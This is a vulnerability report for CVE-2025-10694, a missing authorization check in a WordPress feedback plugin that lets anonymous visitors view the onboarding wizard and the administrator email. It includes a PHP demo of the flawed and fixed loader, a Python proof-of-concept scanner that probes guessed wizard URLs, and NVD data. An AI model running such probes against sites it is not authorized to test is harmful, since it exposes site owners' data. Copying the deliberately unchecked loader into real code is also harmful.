Security Vulnerability Report
CVE-2025-10694 CVSS 5.3 MEDIUM

CVE-2025-10694

Published: 2025-10-25 06:15:33
Last Modified: 2026-04-15 00:35:42

Description

The User Feedback – Create Interactive Feedback Form, User Surveys, and Polls in Seconds plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the `maybe_load_onboarding_wizard` function in all versions up to, and including, 1.8.0. This makes it possible for unauthenticated attackers to access the onboarding wizard page and view configuration information including the administrator email address.
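To make the bug class (CWE-862, missing authorization) concrete, the following is an added illustration and not the User Feedback plugin's own code: a wizard loader gated only on a query parameter, beside the same loader with the missing capability check in place. The class names, the `demo-onboarding` page slug and the hook are assumptions; the stub functions at the top are likewise assumed so the file runs outside WordPress.

```php
<?php
/**
 * Illustration of a missing capability check on an onboarding-wizard loader.
 * NOT the User Feedback plugin's code: class names, the page slug and the
 * hook are assumptions chosen for this example.
 */

// Assumed stubs so this file runs outside WordPress; WordPress provides the real ones.
if ( ! function_exists( 'current_user_can' ) ) {
    function current_user_can( $cap ) {
        return $GLOBALS['demo_caps'][ $cap ] ?? false;
    }
}
if ( ! function_exists( 'get_option' ) ) {
    function get_option( $name ) {
        return 'admin_email' === $name ? 'admin@example.test' : '';
    }
}
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $s ) {
        return htmlspecialchars( $s, ENT_QUOTES, 'UTF-8' );
    }
}
if ( ! function_exists( 'wp_die' ) ) {
    function wp_die( $msg = '', $title = '', $args = array() ) {
        throw new RuntimeException( 'wp_die(' . ( $args['response'] ?? 500 ) . '): ' . $msg );
    }
}

class Demo_Onboarding_Wizard_Vulnerable {
    // In a real plugin this would be attached with
    // add_action( 'init', array( $this, 'maybe_load_onboarding_wizard' ) ) (assumed hook).
    public function maybe_load_onboarding_wizard() {
        // The only gate is a query parameter, so any visitor reaches the wizard.
        if ( empty( $_GET['page'] ) || 'demo-onboarding' !== $_GET['page'] ) {
            return null;
        }
        return $this->render_wizard();
    }

    protected function render_wizard() {
        // Wizards typically pre-fill configuration; here the site admin email leaks.
        return '<input name="email" value="' . esc_attr( get_option( 'admin_email' ) ) . '">';
    }
}

class Demo_Onboarding_Wizard_Fixed extends Demo_Onboarding_Wizard_Vulnerable {
    public function maybe_load_onboarding_wizard() {
        if ( empty( $_GET['page'] ) || 'demo-onboarding' !== $_GET['page'] ) {
            return null;
        }
        // Authorization check, before any output: only users allowed to manage
        // options may see the wizard. A nonce alone would not close this; nonces
        // address CSRF, not whether the caller is authorized at all.
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_die( 'You do not have permission to access this page.', '', array( 'response' => 403 ) );
        }
        return $this->render_wizard();
    }
}

// Demonstration: an anonymous visitor requesting ?page=demo-onboarding.
$_GET['page']         = 'demo-onboarding';
$GLOBALS['demo_caps'] = array(); // anonymous: no capabilities

$vuln = new Demo_Onboarding_Wizard_Vulnerable();
echo "vulnerable loader, anonymous: " . $vuln->maybe_load_onboarding_wizard() . "\n";

$fixed = new Demo_Onboarding_Wizard_Fixed();
try {
    $fixed->maybe_load_onboarding_wizard();
} catch ( RuntimeException $e ) {
    echo "fixed loader, anonymous: " . $e->getMessage() . "\n";
}

// The same request from a user holding manage_options.
$GLOBALS['demo_caps'] = array( 'manage_options' => true );
echo "fixed loader, administrator: " . $fixed->maybe_load_onboarding_wizard() . "\n";
```

Run it with `php demo-onboarding.php`. The vulnerable loader returns the pre-filled form to an anonymous visitor, which is the data exposure the advisory describes; the fixed loader refuses with a 403 and renders only for a user who passes `current_user_can( 'manage_options' )`. When auditing a plugin for this pattern, look for every method that renders or redirects based on a request parameter and confirm a capability check precedes the first byte of output.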

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is available from NVD. Affected product per the description:

User Feedback WordPress plugin <= 1.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-10694 PoC - Unauthenticated Access to Onboarding Wizard
# Affected: User Feedback WordPress Plugin <= 1.8.0
import sys

import requests


def check_vulnerability(target_url):
    """
    Check if the target WordPress site is vulnerable to CVE-2025-10694.

    Returns (vulnerable, exposed_data); exposed_data lists the URLs that
    answered 200 to an unauthenticated request together with the content
    indicators that were actually found.
    """
    # Candidate onboarding wizard URL paths. These are guesses at the wizard's
    # page slug, not values confirmed by the advisory; adjust for the target.
    paths = [
        '/wp-admin/admin.php?page=userfeedback_onboarding',
        '/wp-admin/admin.php?page=userfeedback-setup',
        '/wp-admin/admin.php?page=userfeedback-get-started',
    ]
    # Words expected in a rendered wizard page. This is a weak heuristic:
    # confirm any hit manually before reporting.
    indicators = ('admin', 'email', 'setup')

    vulnerable = False
    exposed_data = []
    for path in paths:
        url = target_url.rstrip('/') + path
        try:
            # No redirects: WordPress core answers anonymous wp-admin requests
            # with a 302 to wp-login.php, so a 200 here is the interesting case.
            response = requests.get(url, timeout=10, allow_redirects=False)
        except requests.RequestException as e:
            print(f"Error accessing {url}: {e}")
            continue

        if response.status_code != 200:
            continue

        content = response.text.lower()
        matched = [word for word in indicators if word in content]
        if matched:
            vulnerable = True
            exposed_data.append({
                'url': url,
                'status': response.status_code,
                'indicators': matched,  # only the words actually present
            })
    return vulnerable, exposed_data


def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-10694.py <target_url>")
        print("Example: python cve-2025-10694.py http://example.com")
        sys.exit(1)
    target = sys.argv[1]
    print(f"[*] Checking vulnerability CVE-2025-10694 on {target}")
    is_vulnerable, data = check_vulnerability(target)
    if is_vulnerable:
        print("[+] VULNERABLE: Onboarding wizard accessible without authentication")
        print(f"[+] Exposed data URLs: {len(data)}")
        for item in data:
            print(f" - {item['url']} (matched: {', '.join(item['indicators'])})")
    else:
        print("[-] NOT VULNERABLE or target not accessible")


if __name__ == "__main__":
    main()
```

References

- https://plugins.trac.wordpress.org/changeset/3378233/userfeedback-lite/trunk/includes/admin/class-userfeedback-onboarding-wizard.php?old=3354862&old_path=userfeedback-lite%2Ftrunk%2Fincludes%2Fadmin%2Fclass-userfeedback-onboarding-wizard.php (plugin changeset 3378233: diff of includes/admin/class-userfeedback-onboarding-wizard.php against 3354862)
- https://www.wordfence.com/threat-intel/vulnerabilities/id/9026b417-4b35-4bec-9dc6-6797661dc7a8?source=cve (Wordfence advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-10694",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-25T06:15:32.620",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The User Feedback – Create Interactive Feedback Form, User Surveys, and Polls in Seconds plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the `maybe_load_onboarding_wizard` function in all versions up to, and including, 1.8.0. This makes it possible for unauthenticated attackers to access the onboarding wizard page and view configuration information including the administrator email address."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3378233/userfeedback-lite/trunk/includes/admin/class-userfeedback-onboarding-wizard.php?old=3354862&old_path=userfeedback-lite%2Ftrunk%2Fincludes%2Fadmin%2Fclass-userfeedback-onboarding-wizard.php",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9026b417-4b35-4bec-9dc6-6797661dc7a8?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```